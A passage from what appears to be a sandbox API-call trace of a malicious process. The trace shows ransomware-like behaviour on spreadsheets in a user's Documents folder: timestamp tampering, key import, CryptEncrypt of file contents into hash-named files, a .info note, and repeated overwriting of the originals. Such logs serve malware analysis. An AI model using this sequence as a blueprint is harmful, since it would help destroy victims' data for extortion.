5ER-b2IqJm_M.xls", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uHqM 5ER-b2IqJm_M.xls", lpFilePart=0x0) returned 0x3d [0075.719] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0075.719] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uHqM 5ER-b2IqJm_M.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\uhqm 5er-b2iqjm_m.xls"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.719] GetFileType (hFile=0x36c) returned 0x1 [0075.719] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0075.719] GetFileType (hFile=0x36c) returned 0x1 [0075.719] SetFileTime (hFile=0x36c, lpCreationTime=0x1bf5db78, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0075.719] CloseHandle (hObject=0x36c) returned 1 [0075.719] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uHqM 5ER-b2IqJm_M.xls", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uHqM 5ER-b2IqJm_M.xls", lpFilePart=0x0) returned 0x3d [0075.719] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0075.719] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uHqM 5ER-b2IqJm_M.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\uhqm 5er-b2iqjm_m.xls"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.720] GetFileType (hFile=0x36c) returned 0x1 [0075.720] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0075.720] GetFileType (hFile=0x36c) returned 0x1 [0075.720] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x1bf5db78, lpLastWriteTime=0x0) returned 1 [0075.720] CloseHandle (hObject=0x36c) returned 1 [0075.720] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uHqM 5ER-b2IqJm_M.xls", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uHqM 5ER-b2IqJm_M.xls", lpFilePart=0x0) returned 0x3d [0075.720] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0075.720] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uHqM 5ER-b2IqJm_M.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\uhqm 5er-b2iqjm_m.xls"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.720] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0075.720] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5db78) returned 1 [0075.721] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uHqM 5ER-b2IqJm_M.xls", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uHqM 5ER-b2IqJm_M.xls", lpFilePart=0x0) returned 0x3d [0075.721] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uHqM 5ER-b2IqJm_M.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\uhqm 5er-b2iqjm_m.xls")) returned 1 [0075.721] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uHqM 5ER-b2IqJm_M.xls", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uHqM 5ER-b2IqJm_M.xls", lpFilePart=0x0) returned 0x3d [0075.722] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4E6D6C583EA757E12DC3003DF792811B", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4E6D6C583EA757E12DC3003DF792811B", lpFilePart=0x0) returned 0x48 [0075.722] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0075.722] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4E6D6C583EA757E12DC3003DF792811B" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\4e6d6c583ea757e12dc3003df792811b"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.722] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0075.722] SetFileTime (hFile=0x36c, lpCreationTime=0x1bf5dc18, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0075.722] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4E6D6C583EA757E12DC3003DF792811B", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4E6D6C583EA757E12DC3003DF792811B", lpFilePart=0x0) returned 0x48 [0075.722] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0075.722] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4E6D6C583EA757E12DC3003DF792811B" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\4e6d6c583ea757e12dc3003df792811b"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.722] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0075.722] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x1bf5dc18, lpLastWriteTime=0x0) returned 1 [0075.722] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4E6D6C583EA757E12DC3003DF792811B", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4E6D6C583EA757E12DC3003DF792811B", lpFilePart=0x0) returned 0x48 [0075.722] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0075.722] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4E6D6C583EA757E12DC3003DF792811B" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\4e6d6c583ea757e12dc3003df792811b"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.722] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0075.722] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5dc18) returned 1 [0075.723] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uokq05CLt9KkwZ-Bx.xls", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uokq05CLt9KkwZ-Bx.xls", lpFilePart=0x0) returned 0x3d [0075.723] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uokq05CLt9KkwZ-Bx.xls", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uokq05CLt9KkwZ-Bx.xls", lpFilePart=0x0) returned 0x3d [0075.723] CryptImportKey (in: hProv=0x1a5b6e10, pbData=0x22e0f98, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5da20 | out: phKey=0x1bf5da20*=0x4ce9f0) returned 1 [0075.723] CryptContextAddRef (hProv=0x1a5b6e10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0075.724] CryptExportKey (in: hKey=0x4ce9f0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x0, pdwDataLen=0x1bf5db30 | out: pbData=0x0*, pdwDataLen=0x1bf5db30*=0x1c) returned 1 [0075.724] CryptExportKey (in: hKey=0x4ce9f0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x22e1088, pdwDataLen=0x1bf5db30 | out: pbData=0x22e1088*, pdwDataLen=0x1bf5db30*=0x1c) returned 1 [0075.724] CryptImportKey (in: hProv=0x1a5b6e10, pbData=0x22e11a8, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5d9f0 | out: phKey=0x1bf5d9f0*=0x1a626b40) returned 1 [0075.724] CryptContextAddRef (hProv=0x1a5b6e10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0075.724] CryptContextAddRef (hProv=0x1a5b6e10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0075.724] CryptDuplicateKey (in: hKey=0x1a626b40, pdwReserved=0x0, dwFlags=0x0, phKey=0x1bf5d9e0 | out: phKey=0x1bf5d9e0*=0x1a626ad0) returned 1 [0075.724] CryptContextAddRef (hProv=0x1a5b6e10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0075.724] CryptSetKeyParam (hKey=0x1a626ad0, dwParam=0x4, pbData=0x22e12f0*=0x1, dwFlags=0x0) returned 1 [0075.724] CryptSetKeyParam (hKey=0x1a626ad0, dwParam=0x1, pbData=0x22e12a0, dwFlags=0x0) returned 1 [0075.724] CryptDestroyKey (hKey=0x1a626b40) returned 1 [0075.724] CryptReleaseContext (hProv=0x1a5b6e10, dwFlags=0x0) returned 1 [0075.724] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uokq05CLt9KkwZ-Bx.xls", nBufferLength=0x105, lpBuffer=0x1bf5d450, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uokq05CLt9KkwZ-Bx.xls", lpFilePart=0x0) returned 0x3d [0075.724] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d930) returned 1 [0075.724] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uokq05CLt9KkwZ-Bx.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\uokq05clt9kkwz-bx.xls"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.724] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8a0) returned 1 [0075.724] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3118A00301631C6C3725ADA13E7B1E6C", nBufferLength=0x105, lpBuffer=0x1bf5d450, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3118A00301631C6C3725ADA13E7B1E6C", lpFilePart=0x0) returned 0x48 [0075.724] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d930) returned 1 [0075.724] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3118A00301631C6C3725ADA13E7B1E6C" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3118a00301631c6c3725ada13e7b1e6c"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x358 [0075.725] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8a0) returned 1 [0075.725] ReadFile (in: hFile=0x36c, lpBuffer=0x22e16c0, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5da28, lpOverlapped=0x0 | out: lpBuffer=0x22e16c0*, lpNumberOfBytesRead=0x1bf5da28*=0x40a7, lpOverlapped=0x0) returned 1 [0075.726] CryptEncrypt (in: hKey=0x1a626ad0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x22f56d8*, pdwDataLen=0x1bf5da80*=0x40a0, dwBufLen=0x40a0 | out: pbData=0x22f56d8*, pdwDataLen=0x1bf5da80*=0x40a0) returned 1 [0075.726] WriteFile (in: hFile=0x358, lpBuffer=0x22f56d8*, nNumberOfBytesToWrite=0x40a0, lpNumberOfBytesWritten=0x1bf5da18, lpOverlapped=0x0 | out: lpBuffer=0x22f56d8*, lpNumberOfBytesWritten=0x1bf5da18*=0x40a0, lpOverlapped=0x0) returned 1 [0075.727] ReadFile (in: hFile=0x36c, lpBuffer=0x22e16c0, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5da28, lpOverlapped=0x0 | out: lpBuffer=0x22e16c0*, lpNumberOfBytesRead=0x1bf5da28*=0x0, lpOverlapped=0x0) returned 1 [0075.727] CryptEncrypt (in: hKey=0x1a626ad0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x22f97b8*, pdwDataLen=0x1bf5d9c0*=0x10, dwBufLen=0x10 | out: pbData=0x22f97b8*, pdwDataLen=0x1bf5d9c0*=0x10) returned 1 [0075.727] CryptEncrypt (in: hKey=0x1a626ad0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x22f9808*, pdwDataLen=0x1bf5d9c0*=0x0, dwBufLen=0x10 | out: pbData=0x22f9808*, pdwDataLen=0x1bf5d9c0*=0x10) returned 1 [0075.727] WriteFile (in: hFile=0x358, lpBuffer=0x22f9858*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x1bf5d948, lpOverlapped=0x0 | out: lpBuffer=0x22f9858*, lpNumberOfBytesWritten=0x1bf5d948*=0x10, lpOverlapped=0x0) returned 1 [0075.727] CloseHandle (hObject=0x358) returned 1 [0075.728] CloseHandle (hObject=0x36c) returned 1 [0075.728] CryptDestroyKey (hKey=0x4ce9f0) returned 1 [0075.728] CryptReleaseContext (hProv=0x1a5b6e10, dwFlags=0x0) returned 1 [0075.728] CryptReleaseContext (hProv=0x1a5b6e10, dwFlags=0x0) returned 1 [0075.728] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3118A00301631C6C3725ADA13E7B1E6C", nBufferLength=0x105, lpBuffer=0x1bf5d480, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3118A00301631C6C3725ADA13E7B1E6C", lpFilePart=0x0) returned 0x48 [0075.729] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d960) returned 1 [0075.729] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3118A00301631C6C3725ADA13E7B1E6C" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3118a00301631c6c3725ada13e7b1e6c"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.729] GetFileType (hFile=0x36c) returned 0x1 [0075.729] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8d0) returned 1 [0075.729] GetFileType (hFile=0x36c) returned 0x1 [0075.729] ReadFile (in: hFile=0x36c, lpBuffer=0x22faf50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22faf50*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.730] ReadFile (in: hFile=0x36c, lpBuffer=0x22faf50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22faf50*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.731] ReadFile (in: hFile=0x36c, lpBuffer=0x22faf50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22faf50*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.732] ReadFile (in: hFile=0x36c, lpBuffer=0x22faf50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22faf50*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.733] ReadFile (in: hFile=0x36c, lpBuffer=0x22faf50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22faf50*, lpNumberOfBytesRead=0x1bf5da48*=0xb0, lpOverlapped=0x0) returned 1 [0075.733] ReadFile (in: hFile=0x36c, lpBuffer=0x22faf50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22faf50*, lpNumberOfBytesRead=0x1bf5da48*=0x0, lpOverlapped=0x0) returned 1 [0075.733] CloseHandle (hObject=0x36c) returned 1 [0075.735] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3118A00301631C6C3725ADA13E7B1E6C.info", nBufferLength=0x105, lpBuffer=0x1bf5d200, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3118A00301631C6C3725ADA13E7B1E6C.info", lpFilePart=0x0) returned 0x4d [0075.735] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d6e0) returned 1 [0075.735] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3118A00301631C6C3725ADA13E7B1E6C.info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3118a00301631c6c3725ada13e7b1e6c.info"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.789] GetFileType (hFile=0x36c) returned 0x1 [0075.789] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d650) returned 1 [0075.790] GetFileType (hFile=0x36c) returned 0x1 [0075.790] WriteFile (in: hFile=0x36c, lpBuffer=0x23075f0*, nNumberOfBytesToWrite=0x77d, lpNumberOfBytesWritten=0x1bf5d7b8, lpOverlapped=0x0 | out: lpBuffer=0x23075f0*, lpNumberOfBytesWritten=0x1bf5d7b8*=0x77d, lpOverlapped=0x0) returned 1 [0075.790] CloseHandle (hObject=0x36c) returned 1 [0075.791] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uokq05CLt9KkwZ-Bx.xls", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uokq05CLt9KkwZ-Bx.xls", lpFilePart=0x0) returned 0x3d [0075.791] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5da70) returned 1 [0075.791] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uokq05CLt9KkwZ-Bx.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\uokq05clt9kkwz-bx.xls"), fInfoLevelId=0x0, lpFileInformation=0x1bf5db50 | out: lpFileInformation=0x1bf5db50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe31f2fe0, ftCreationTime.dwHighDateTime=0x1d4d532, ftLastAccessTime.dwLowDateTime=0x91c23880, ftLastAccessTime.dwHighDateTime=0x1d4c638, ftLastWriteTime.dwLowDateTime=0x91c23880, ftLastWriteTime.dwHighDateTime=0x1d4c638, nFileSizeHigh=0x0, nFileSizeLow=0x40a7)) returned 1 [0075.792] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5da30) returned 1 [0075.792] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uokq05CLt9KkwZ-Bx.xls", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uokq05CLt9KkwZ-Bx.xls", lpFilePart=0x0) returned 0x3d [0075.792] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uokq05CLt9KkwZ-Bx.xls", dwFileAttributes=0x80) returned 1 [0075.792] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uokq05CLt9KkwZ-Bx.xls", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uokq05CLt9KkwZ-Bx.xls", lpFilePart=0x0) returned 0x3d [0075.792] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5dab0) returned 1 [0075.792] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uokq05CLt9KkwZ-Bx.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\uokq05clt9kkwz-bx.xls"), fInfoLevelId=0x0, lpFileInformation=0x230f1f8 | out: lpFileInformation=0x230f1f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe31f2fe0, ftCreationTime.dwHighDateTime=0x1d4d532, ftLastAccessTime.dwLowDateTime=0x91c23880, ftLastAccessTime.dwHighDateTime=0x1d4c638, ftLastWriteTime.dwLowDateTime=0x91c23880, ftLastWriteTime.dwHighDateTime=0x1d4c638, nFileSizeHigh=0x0, nFileSizeLow=0x40a7)) returned 1 [0075.792] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5da70) returned 1 [0075.792] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uokq05CLt9KkwZ-Bx.xls", nBufferLength=0x105, lpBuffer=0x1bf5d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uokq05CLt9KkwZ-Bx.xls", lpFilePart=0x0) returned 0x3d [0075.792] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9a0) returned 1 [0075.792] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uokq05CLt9KkwZ-Bx.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\uokq05clt9kkwz-bx.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.792] GetFileType (hFile=0x36c) returned 0x1 [0075.792] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d910) returned 1 [0075.792] GetFileType (hFile=0x36c) returned 0x1 [0075.792] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0075.793] WriteFile (in: hFile=0x36c, lpBuffer=0x230f6c0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x230f6c0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.794] WriteFile (in: hFile=0x36c, lpBuffer=0x230f6c0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x230f6c0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.795] WriteFile (in: hFile=0x36c, lpBuffer=0x230f6c0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x230f6c0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.795] WriteFile (in: hFile=0x36c, lpBuffer=0x230f6c0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x230f6c0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.796] WriteFile (in: hFile=0x36c, lpBuffer=0x230f6c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x1bf5daa8, lpOverlapped=0x0 | out: lpBuffer=0x230f6c0*, lpNumberOfBytesWritten=0x1bf5daa8*=0x200, lpOverlapped=0x0) returned 1 [0075.796] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0075.796] WriteFile (in: hFile=0x36c, lpBuffer=0x230f6c0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x230f6c0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.797] WriteFile (in: hFile=0x36c, lpBuffer=0x230f6c0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x230f6c0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.798] WriteFile (in: hFile=0x36c, lpBuffer=0x230f6c0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x230f6c0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.799] WriteFile (in: hFile=0x36c, lpBuffer=0x230f6c0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x230f6c0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.799] WriteFile (in: hFile=0x36c, lpBuffer=0x230f6c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x1bf5daa8, lpOverlapped=0x0 | out: lpBuffer=0x230f6c0*, lpNumberOfBytesWritten=0x1bf5daa8*=0x200, lpOverlapped=0x0) returned 1 [0075.799] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0075.800] WriteFile (in: hFile=0x36c, lpBuffer=0x230f6c0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x230f6c0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.800] WriteFile (in: hFile=0x36c, lpBuffer=0x230f6c0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x230f6c0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.801] WriteFile (in: hFile=0x36c, lpBuffer=0x230f6c0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x230f6c0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.802] WriteFile (in: hFile=0x36c, lpBuffer=0x230f6c0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x230f6c0*, 